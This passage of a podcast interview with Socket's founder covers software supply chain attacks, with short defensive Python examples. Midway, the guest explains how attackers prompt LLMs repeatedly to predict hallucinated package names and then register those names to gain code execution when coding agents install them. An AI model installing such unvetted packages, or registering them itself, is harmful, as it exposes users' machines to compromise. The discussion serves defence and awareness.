Yeah, that's a great point. One of the things that we've actually seen with a customer is Dependabot opened a PR and then Socket came in and left a comment and said, do not upgrade to this package. It's malicious. So it was like a battle of the bots. One bot is like upgrade and then another bot is like don't upgrade. So yeah, no, totally. It's a really good point. And some folks do try to do a delay to sort of protect themselves from these things. So that is another piece of advice, you know, that I would recommend if you have an easy way to, you know, not take updates until, you know, seven or 14 or 30 days have gone by. That's a really great way to avoid a subset of these attacks. Like it won't avoid all of them. As I mentioned, some of them stick around for hundreds of days, even after Socket's identified them and reported them. So it's not foolproof. And it also means that you're not going to get vulnerability fixes if you're waiting 30 days unconditionally. So you might want to have a more nuanced policy where you wait 30 days, unless there's a critical CVE, in which case you might want to do it sooner. So, yeah, there's really a lot of options here.
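The "wait, unless there's a critical CVE" policy from this answer can be written down in a few lines. The sketch below is only an illustration: the function name, the default of seven days, and the `fixes_critical_cve` flag are assumptions, and how a team learns that a release fixes a critical CVE is left outside the example.

```python
from datetime import datetime, timedelta, timezone


def should_take_update(
    published_at: datetime,
    now: datetime,
    min_age_days: int = 7,
    fixes_critical_cve: bool = False,
) -> bool:
    """Accept a new version once it has aged, or right away for a critical fix."""
    if fixes_critical_cve:
        return True
    return now - published_at >= timedelta(days=min_age_days)


now = datetime(2025, 7, 30, tzinfo=timezone.utc)
fresh = datetime(2025, 7, 29, tzinfo=timezone.utc)  # published one day ago
aged = datetime(2025, 7, 1, tzinfo=timezone.utc)    # published 29 days ago

print(should_take_update(fresh, now))                           # False
print(should_take_update(aged, now))                            # True
print(should_take_update(fresh, now, fixes_critical_cve=True))  # True
```

As noted in the conversation, a delay like this only helps with malicious releases that get caught within the waiting window, so it complements scanning rather than replacing it.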
Josh Goldberg
One of the great and terrible points of working in security is that as soon as you fix or largely prevent one style of attack, the attackers will then figure out another, somewhat more complex area or style of attack. What do you think is the next round or the next area that you're going to have to focus on?
Faras Abu Khadija
Yeah, I think that there's a couple ways I could take this. I think I'll maybe mention just the way that we're seeing some of the same types of attacks that have affected open source package ecosystems starting to come to maybe less obvious ecosystems like Chrome extensions, Firefox extensions, VS Code extensions. So these are also just JavaScript packages at the end of the day, if you think about it. And so some of the same types of supply chain attacks that we've seen affect NPM are now starting to affect all these other ones. But they also have, in some ways, even their own challenges. If you take Chrome extensions for example, they're similar to NPM packages in that they run in a very privileged environment, they run in your browser, and some of them have access to all site content on all pages that you visit. So kind of very similar to a package running on your local machine with all of your user permissions and, you know, being able to access all your local files and things like that. But in some ways they're even worse because. So there's a certain thing we've seen in Chrome extensions that we've seen a lot less of in open source ecosystems, and that is selling of extensions. So folks will just sell their extension to somebody else. You know, it could have a million installs and they'll just sell it for like 30k or 40k to some random person who offers them money. And I kind of get where they're coming from. A lot of times folks build these extensions and they don't have any way to monetize them and they're just sitting there and then, you know, they can get a meaningful chunk of money like that. You know, they're just like, yeah, why not? And they often don't necessarily know that the person buying it is going to change the behavior in a malicious way. The buyers often tell a story about how they're going to improve it, they're going to keep working on it and all this other stuff. 
So we've seen that happen a few times in the Chrome ecosystem to really poor results for everybody involved. So I think that's an area for us that's like, you know, I guess it's sort of expected that attackers are going to go there. They're just always looking for where's the next way that we can get into environments. And I guess just to kind of cap that off, I should mention that we actually just announced this week, yesterday, so July 29, for those who are listening to this at a future date, that we now scan Chrome extensions and we're going to be doing VS Code and the rest. So very exciting new product for us. And yeah, hopefully we can help keep folks safe, you know, even in their browser. But yeah, I think the other thing that's interesting is AI, just the way folks are using it. So there's a lot of folks vibe coding these days. And one other area that we've seen attackers go is, you know, everyone knows LLMs can hallucinate. And one of the most dangerous ways they can hallucinate is when they're writing code, especially if they're executing that code like without user interaction, like in an agent. And so everyone is pretty aware, I think, of the idea that, you know, they can write buggy code, they can write, you know, poor quality code, spaghetti code. But far fewer people have realized that, you know, LLMs can also just write insecure code, or specifically they can install dependencies that are insecure. In some cases they can hallucinate package names that don't even exist. They're not even real packages. And so what attackers have actually started doing is like running the LLMs and asking the same question a bunch of times, getting a bunch of lists of what packages the LLM attempts to install, and then they go and they squat on those names. 
So if you can basically predict what the LLM is going to hallucinate, you can go register all those names and Just like you would squat on a domain name, you can squat on the hallucinated names and then you can, you know, basically get remote code execution on anyone's machine, you know, when the LLM selects those packages. So that's one where it's nasty and it's very, very much like a 2025 kind of a problem.
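One simple defensive habit against hallucinated package names is to never let an agent install a dependency the team has not already vetted. The sketch below shows that check and nothing more. The allowlist contents, the function name, and the example suggestions are all hypothetical, and deciding whether an unknown name is safe still needs a scanner or a human.

```python
def split_by_vetted(
    suggested: list[str], vetted: set[str]
) -> tuple[list[str], list[str]]:
    """Split suggested package names into (allowed, needs_review), keeping order."""
    allowed: list[str] = []
    needs_review: list[str] = []
    for name in suggested:
        normalized = name.strip().lower()
        if normalized in vetted:
            allowed.append(normalized)
        else:
            needs_review.append(normalized)
    return allowed, needs_review


# Hypothetical allowlist, for example the names already in the team's lockfile.
VETTED = {"express", "lodash", "react"}

# Hypothetical names proposed by a coding agent; the last one is made up.
suggested = ["express", "Lodash", "fast-json-magic-parser"]

allowed, needs_review = split_by_vetted(suggested, VETTED)
print(allowed)       # ['express', 'lodash']
print(needs_review)  # ['fast-json-magic-parser']
```

Anything that lands in `needs_review` is exactly the kind of name an attacker could have registered in advance, so it should be inspected before it is installed rather than after.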
Josh Goldberg
It's kind of a beautiful attack when you think about it. It's just so clever.
Faras Abu Khadija
Yeah, I agree. The attackers are always. I mean, that's what they do. Whatever's new, they're already thinking of how to break it. In this AI world where everyone's just trying to go super fast and like, you know, security is an afterthought, as it always is. Whenever there's like a new paradigm shift, there's going to be stuff like this and the attackers are going to find it, like they always do. And that's definitely what's happening with AI. Like, security is such an afterthought. It's just like, you know, I mean, another one is MCP servers, right? Everyone is just hooking up, like they're taking all these API tokens and putting them into like, local files on their disk that any malware can just grab, right? Any NPM package that's backdoored can just take those things. They're putting all these tokens into these files and then they're connecting all these, you know, disparate data sources like their Google Drives, their, you know, their emails, all their most sensitive information, so that they can talk to it, you know, and have the MCP server, you know, give new tools to the agents. But then first of all, the files are just sitting there with all the tokens. But then on top of that, you fundamentally have a black box AI model that nobody really knows what it's going to do that, like, you know, has privileged tokens accessing like all this stuff. So it keeps me up at night a little bit.
Josh Goldberg
As a member of the defense or the blue team, how do you prevent against these types of attacks?
Faras Abu Khadija
I don't know if there's a really good way for a lot of this AI stuff because a lot of the adoption is being driven by like company boards and, you know, company leadership. They don't want to be left behind. They're getting asked all the time, like, what is your AI strategy? What are you going to do for AI? And so there's a lot of pressure to like, just tell everybody, like to just use all the stuff, you know, and not to worry so much about security. So even formerly very security conscious companies and, you know, CTOs and engineering leaders are kind of like lowering their standards a little bit in this rush to, you know, adopt this stuff super fast. So I don't have a great answer for you like how to generally solve this problem. I think security will get figured out over the next couple of years like it always does with these things and it will be bolted on and it'll have a bunch of gotchas as it always does when you do it after the fact. So I don't know. We'll see.
Josh Goldberg
We'll see. I've got one last technical question, just as a curiosity. There are sort of traditional ways to run JavaScript that you've mentioned, Node and NPM, and now there are newer variants of those like pnpm and Deno that have more restrictive security models. Do you have thoughts or opinions on those in the security landscape given what we've talked about?
Faras Abu Khadija
Yeah, I think that I love more experimentation. I love to see the stuff that those teams are doing. I think that pnpm, I believe, now restricts install scripts by default. So that's awesome to see because like I said, yes, they have legitimate uses, but if you have a backdoored package, if you have a malicious package, like the vast majority of them are going to use that feature. And the other thing that's nice about it is it's such a rarely used piece of functionality that it's actually not that onerous to just ask the user, hey, is it okay if this package runs this install script? So I think it's really great what they did. And then Deno obviously has like its permission model, which is really interesting. I'm a fan of that. Node has also actually kind of adopted a similar way (it's pretty different, but it sort of does the same thing) of running packages with really locked down permissions on those executions. So it's great to see this kind of stuff. I mean, I will say, like I've really met very few people that actually are able to use that. Like, you know, I don't want to pick on anyone. Node's and Deno's permission models are, like, not really used in my experience, at least in real world applications. It's really helpful when you're pulling a random script off the Internet and you want to run it and you don't want to give it access to the network and to your file system and stuff. It's amazing. But like if you're building a real application, like, you know, that has to do all the things like talk to the network, read the files, you know, all this stuff, you're going to give it all the permissions anyway. And so I think it's good, but it's not widely used and not really in its final form yet.
Josh Goldberg
More feature rich experimentation required?
Faras Abu Khadija
Yeah, I think so. And then more work on the developer experience, like how do you write these policy files? Like the Node policy file is a really complex format, last I looked at it. So I think there'll need to be some ways to auto generate that, that work really effectively and don't break your application, before you're going to see widespread adoption of that kind of stuff.
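The install-script signal that comes up repeatedly in this conversation is easy to check for yourself. In an NPM package, the `preinstall`, `install`, and `postinstall` entries under `scripts` in `package.json` run automatically at install time. The sketch below lists them for a manifest. The function name and the sample manifest are illustrative assumptions, and, as discussed earlier, the presence of such a script is a reason to look closer, not proof of malware.

```python
import json

# NPM lifecycle hooks that run automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_scripts(package_json_text: str) -> dict[str, str]:
    """Return the install-time scripts declared in a package.json document."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


# Made-up manifest for illustration.
manifest_text = json.dumps(
    {
        "name": "example-package",
        "version": "1.0.0",
        "scripts": {"test": "node test.js", "postinstall": "node setup.js"},
    }
)

print(install_scripts(manifest_text))  # {'postinstall': 'node setup.js'}
```

This only inspects hooks declared in the manifest, so treat it as a first-pass filter over a dependency tree rather than a complete audit.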
Josh Goldberg
Looking forward to it. Faras, in our last minute, I'd like to end interviews with something very much non technical. Can you tell us about your cats?
Faras Abu Khadija
Sure, yeah. So I got two cats. One is called Butter and one is called Cream and they are about one year old now actually. They just turned one and they're amazing. They're super cute. I was hesitant to get cats for a super long time because, you know, I'm really busy working on the company and just, you know, traveling a lot and I thought they would be, you know, a bit of a burden to find someone to take care of them when we're gone and stuff like that. But my wife was really excited about the idea of getting them and I've always loved cats and so she kept talking about it. And then one day I come home and in the bathroom, in the bathtub, I find a bunch of litter, cat food, and a bunch of cat toys and I'm like, okay, she's up to something. And then like the next day when I come home, there's two kittens in the house. So she just kind of like went off on her own and got them, ordered them on Craigslist actually. So someone was looking for a home for their two kittens and she got sent some videos and then actually had them delivered via Uber package delivery. So Uber picked them up and drove them two hours to our place. And that was probably a really fun Uber ride for that driver, having two kittens in the car. It's been amazing. They are a joy.
Josh Goldberg
Cats are fantastic. Since you mentioned conferences earlier, I found that in cities, for example, Athens, that have a large amount of cats going out with other conference attendees and speakers to feed street cats is a surprisingly fantastic bonding and networking activity.
Faras Abu Khadija
That's so funny. So they just go out and give food to the cats and hang out with them. The wild cats.
Josh Goldberg
Yeah. Walk 30 seconds in any direction from say, city center, Athens. You'll find them.
Faras Abu Khadija
That's awesome. I also found certain parts of Tokyo or certain neighborhoods have tons of wild cats, feral cats, I guess, going around. And I just love cats. Yeah, their behaviors are super cute. They're always up to something. They're always investigating or trying to do something that they're not supposed to. It's kind of fun.
Josh Goldberg
Given how much time you spend day to day on people with very malicious intentions, it must be nice to work with a creature where the maximum maliciousness is that they want the treat you're not supposed to give them.
Faras Abu Khadija
Yeah, it's so true. They do get in trouble too. Like they do find ways to climb into things they're not supposed to get to. We just built a catio, which is like a, like a little cat house outdoors over here by my desk. And it's quite big. It's like a 8 foot by 6 foot, like outdoor structure. And they, I just crack the door and then they're able to kind of go directly into the catio, but there's currently a little gap in the part above it and so they figured out they can climb up the side of it and then get outside. So I'm going to have to like add another layer of chicken wire on the top to kind of fully seal it with the door or else they're going to find a way to get out.
Josh Goldberg
Crafty creatures.
Faras Abu Khadija
Yeah, for sure.
Josh Goldberg
Well, Faras, thank you so much for spending extra time to talk. Not just about your open source career and journey and what it's like to be a maintainer and all the stuff Socket is doing to help protect open source projects and companies, but also about your two adorable cats. If folks want to learn more about you and/or Socket, where would you ask that they go on the Internet?
Faras Abu Khadija
Yeah, I have a blog that doesn't get updated that much, but has a bunch of my writing, at feross.org, and then you can learn about Socket at socket.dev. And if folks want to email me, my email is just my first name at socket.dev, so feel free to hit me up. I always love talking about open source or security or whatever, so feel free to reach out.
Josh Goldberg
Well, that's fantastic. For Software Engineering Daily, this has been Faras and Josh Goldberg. Cheers. Y'all have a nice day.
Faras Abu Khadija
Thanks Josh.
Release Date: December 9, 2025
Guest: Feross Aboukhadijeh, Founder & CEO of Socket
Host: Josh Goldberg
This episode centers on software supply chain security, with a deep dive into the risks posed by open source dependencies and practical strategies to defend against malicious packages. Feross Aboukhadijeh, an influential open-source developer and security entrepreneur, discusses his journey from early web projects, through open source burnout, to founding Socket—an advanced tool for detecting and preventing supply chain attacks.
Feross shares his contact details and expresses openness to conversations about open source and security.
Blog: feross.org
Socket: socket.dev
Email: feross@socket.dev
For further exploration, listeners are encouraged to consider their software supply chain posture, try out tools like Socket for automated vigilance, and remember: “You’re responsible for what your code does—even if you didn’t write every line.”